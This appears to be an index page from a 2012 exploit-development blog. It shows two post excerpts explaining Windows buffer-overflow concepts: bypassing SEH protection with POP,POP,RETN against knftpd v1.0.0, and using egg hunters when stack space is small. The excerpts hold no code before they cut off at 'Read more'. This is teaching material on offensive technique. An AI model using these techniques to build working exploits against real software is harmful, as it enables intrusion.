Just follow the applications flow

KUMΞL | Monday, March 19, 2012 | | 0 comments

knftpd v1.0.0
In a concept if we are finding the application which have SEH protection in our process of an exploit development we must bypass the SEH protection first using POP,POP,RETN instruction and then we have control the EIP register at Next SEH position, but sometimes we must follow the applications flow.
Now we will try to do how to build an exploit with following the applications flow. We will use knftpd-v1.0.0 application. Hem, it's a sounds good to be practice materials in this case. I know if it already exploited in last year and the exploit can be found here, but here i'm trying to explain how to build an exploit at that application.
The application have overflow if we sending an overly long request to Multiple FTP command, so we can create fuzzer like below to have crash in that application :

Read more »

Build an exploit in low space of your stack (Egg Hunter)

KUMΞL | Wednesday, March 07, 2012 | , | 2 comments


Sometimes if we're fuzzing an application, the application crashed and our fuzzer overwrited some register of it (the values of its register was replaced with our fuzzer) even the most dangerous is our fuzzer have overwrite the values in Instruction Pointer register (IP in 16bit or EIP in 32bit) so we have full control of it resgister which causes we can change flow of that application as we want.
Why be like that? It because EIP register was using to store a memory address (which called as offset) of command to be executed at next. What will happen if we send payload to the stack of that application and then we inserting a memory address of instruction to jump into the stack on EIP register?
Our payload will execute and it's owned. ^_^
To avoid it the developer usually using an "exception" which called as Structure Exception Handling (SEH) to protect the application.

Read more »
Subscribe to: Posts (Atom)